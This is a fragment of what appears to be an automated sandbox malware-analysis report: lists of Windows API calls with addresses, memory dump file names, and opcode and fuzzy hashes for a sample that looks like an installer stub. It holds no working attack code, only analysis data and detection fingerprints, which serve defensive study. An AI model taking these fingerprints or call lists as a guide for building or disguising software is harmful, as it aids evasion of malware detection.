                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: H7B${
                                              • API String ID: 590372296-2256286769
                                              • Opcode ID: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
                                              • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
                                              • Opcode Fuzzy Hash: de83834612293bf752b8c6c6de4c5caa3b4facca9786645fdbb76cb5e3bc5ba2
                                              • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 004049D2
                                              • SetWindowTextW.USER32(00000000,?), ref: 004049FC
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404AAD
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404AB8
                                              • lstrcmpiW.KERNEL32(open cmd,00423748,00000000,?,?), ref: 00404AEA
                                              • lstrcatW.KERNEL32(?,open cmd), ref: 00404AF6
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B08
                                                • Part of subcall function 00405B86: GetDlgItemTextW.USER32(?,?,00000400,00404B3F), ref: 00405B99
                                                • Part of subcall function 004067EB: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 0040684E
                                                • Part of subcall function 004067EB: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040685D
                                                • Part of subcall function 004067EB: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406862
                                                • Part of subcall function 004067EB: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00435000,004035B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00406875
                                              • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404BCB
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BE6
                                                • Part of subcall function 00404D3F: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE0
                                                • Part of subcall function 00404D3F: wsprintfW.USER32 ref: 00404DE9
                                                • Part of subcall function 00404D3F: SetDlgItemTextW.USER32(?,00423748), ref: 00404DFC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: A$H7B$open cmd
                                              • API String ID: 2624150263-3876686485
                                              • Opcode ID: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
                                              • Instruction ID: 8299be71a3cc8d15b5ba292867d4bcc1bae11f059afa92557538f40593a335a7
                                              • Opcode Fuzzy Hash: dd814ec643b45a90e93cf69e5cb033f89cff98d2f4c91cecb2b3846f87e86dba
                                              • Instruction Fuzzy Hash: 8EA193B1900209ABDB11AFA5DD45AAFB7B8EF84314F11803BF601B62D1D77C9941CB6D
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,00000000), ref: 00405C77
                                              • lstrcatW.KERNEL32(00425750,\*.*), ref: 00405CBF
                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405CE2
                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CE8
                                              • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405CF8
                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D98
                                              • FindClose.KERNEL32(00000000), ref: 00405DA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                              • String ID: PWB$\*.*
                                              • API String ID: 2035342205-3290065635
                                              • Opcode ID: 3a6aa6978e1e6dac12dbcf27a865e65220d343208ac152093f5b12310eb1b7a8
                                              • Instruction ID: 388f2befc2087cc18a81576ce5b748581f321be521e7d033b0a51c5b8adb9818
                                              • Opcode Fuzzy Hash: 3a6aa6978e1e6dac12dbcf27a865e65220d343208ac152093f5b12310eb1b7a8
                                              • Instruction Fuzzy Hash: C141CF30800A14BADB21AB65DC8DABF7678EF41718F50813BF841B51D1D77C4A82DEAE
                                              APIs
                                              • FindFirstFileW.KERNEL32(74DF3420,00426798,00425F50,00405F62,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 004068A5
                                              • FindClose.KERNEL32(00000000), ref: 004068B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                              • Instruction ID: 17741e7b15207d6702ed9fc8e7bdeca0d2b34881c01bff23dce0e4374d0b2feb
                                              • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                              • Instruction Fuzzy Hash: 1FD0C7315051205BD24116346D4C84765985F55331311CA36B4A5F11A0C7348C3246AC
                                              APIs
                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CreateInstance
                                              • String ID:
                                              • API String ID: 542301482-0
                                              • Opcode ID: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
                                              • Instruction ID: 3a0b8fa6945436ea0e4cb0e043321d643ed21fd69d70badd8d93d2b131f18866
                                              • Opcode Fuzzy Hash: 5af9135ba59482d15b8eba766ae0685eae6086f6b6ffaba7cd38e99d6e7f92d4
                                              • Instruction Fuzzy Hash: C9412775A00209AFCF00DFE4C989A9E7BB6FF48304B20457AF915EB2D1DB799981CB54
                                              APIs
                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                                              • Instruction ID: e1d09971df8357d0b6d26b0e23bbdd0a86073f761c05595cd8bb911c59de634c
                                              • Opcode Fuzzy Hash: 73ea5844b7f20d7c5e79e975fdc737a0938daa2fd1a0c7191d7c211d4df56dda
                                              • Instruction Fuzzy Hash: C9F08C71A00104AFC700DFA4ED499AEB378EF10314F70857BE916F21E0D7B89E119B2A
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404F16
                                              • GetDlgItem.USER32(?,00000408), ref: 00404F23
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F6F
                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F86
                                              • SetWindowLongW.USER32(?,000000FC,00405518), ref: 00404FA0
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB4
                                              • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404FC8
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDD
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FE9
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFB
                                              • DeleteObject.GDI32(00000110), ref: 00405000
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                              • ShowWindow.USER32(?,00000005), ref: 00405162
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405263
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C5
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052DA
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FE
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405321
                                              • ImageList_Destroy.COMCTL32(?), ref: 00405336
                                              • GlobalFree.KERNEL32(?), ref: 00405346
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053BF
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405468
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405477
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054A1
                                              • ShowWindow.USER32(?,00000000), ref: 004054EF
                                              • GetDlgItem.USER32(?,000003FE), ref: 004054FA
                                              • ShowWindow.USER32(00000000), ref: 00405501
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 2564846305-813528018
                                              • Opcode ID: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
                                              • Instruction ID: 51cb895bf96748e94aa34dbd086816f234b0803d1cad36f3447be88a3ed44bf2
                                              • Opcode Fuzzy Hash: 30c87aeda25f360d81773f0e2c70f123d365d9cc6a167c9b0a22042fa7f78e66
                                              • Instruction Fuzzy Hash: 0C126970900609EFDF209FA5DC45AAE7BB5FB44314F10817AEA10BA2E1D7798A52CF58
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FF5
                                              • ShowWindow.USER32(?), ref: 00404012
                                              • DestroyWindow.USER32 ref: 00404026
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404042
                                              • GetDlgItem.USER32(?,?), ref: 00404063
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404077
                                              • IsWindowEnabled.USER32(00000000), ref: 0040407E
                                              • GetDlgItem.USER32(?,00000001), ref: 0040412C
                                              • GetDlgItem.USER32(?,00000002), ref: 00404136
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404150
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A1
                                              • GetDlgItem.USER32(?,00000003), ref: 00404247
                                              • ShowWindow.USER32(00000000,?), ref: 00404268
                                              • EnableWindow.USER32(?,?), ref: 0040427A
                                              • EnableWindow.USER32(?,?), ref: 00404295
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042AB
                                              • EnableMenuItem.USER32(00000000), ref: 004042B2
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042CA
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042DD
                                              • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404307
                                              • SetWindowTextW.USER32(?,00423748), ref: 0040431B
                                              • ShowWindow.USER32(?,0000000A), ref: 0040444F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                              • String ID: H7B
                                              • API String ID: 184305955-2300413410
                                              • Opcode ID: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
                                              • Instruction ID: 474293f91904d384e756f83d9200f154ec1a476d51ccc5c10f5d023ba508d08e
                                              • Opcode Fuzzy Hash: ad2877bd5c4ea7cc256e3088b2b3c42cb38b7d734cc530d92285f8f03c2605ef
                                              • Instruction Fuzzy Hash: 17C1B1B1600604FBCB216F61EE85E2A7BB8EB84705F40497EF741B51F1CB3958529B2E
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046EF
                                              • GetDlgItem.USER32(?,000003E8), ref: 00404703
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404720
                                              • GetSysColor.USER32(?), ref: 00404731
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040473F
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040474D
                                              • lstrlenW.KERNEL32(?), ref: 00404752
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040475F
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404774
                                              • GetDlgItem.USER32(?,0000040A), ref: 004047CD
                                              • SendMessageW.USER32(00000000), ref: 004047D4
                                              • GetDlgItem.USER32(?,000003E8), ref: 004047FF
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404842
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404850
                                              • SetCursor.USER32(00000000), ref: 00404853
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040486C
                                              • SetCursor.USER32(00000000), ref: 0040486F
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040489E
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: N$open cmd
                                              • API String ID: 3103080414-1465111519
                                              • Opcode ID: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                                              • Instruction ID: 9740ae806e86bdd9a5d1823962a5ed5927fd13c96e858ba55e5d087808badbab
                                              • Opcode Fuzzy Hash: 109bfc3f4ae54697b435cbc64e06ea45ef072446bfa87c0e9d4d0ff38833786b
                                              • Instruction Fuzzy Hash: EE6193B1900209FFDB10AF60DD85E6A7B69FB84314F00853AFA05B62D1D7789D51CF98
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406323,?,?), ref: 004061C3
                                              • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004061CC
                                                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                                • Part of subcall function 00405F97: lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                              • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 004061E9
                                              • wsprintfA.USER32 ref: 00406207
                                              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406242
                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406251
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406289
                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 004062DF
                                              • GlobalFree.KERNEL32(00000000), ref: 004062F0
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F7
                                                • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,00438800,80000000,00000003), ref: 00406036
                                                • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                              • API String ID: 2171350718-2295842750
                                              • Opcode ID: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
                                              • Instruction ID: 390cd084817c4cf50855a9647c10840f2cfe6cacc919d204b2e4a530669b52c0
                                              • Opcode Fuzzy Hash: 1370db5916d635a3eaa8287a3a8568cfa6b7ad2c16bbfcffe5a040e030d3314f
                                              • Instruction Fuzzy Hash: FB312231200715BBC2207B659E49F5B3A9CEF41754F16007FBA42F62C2EA3CD82586BD
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
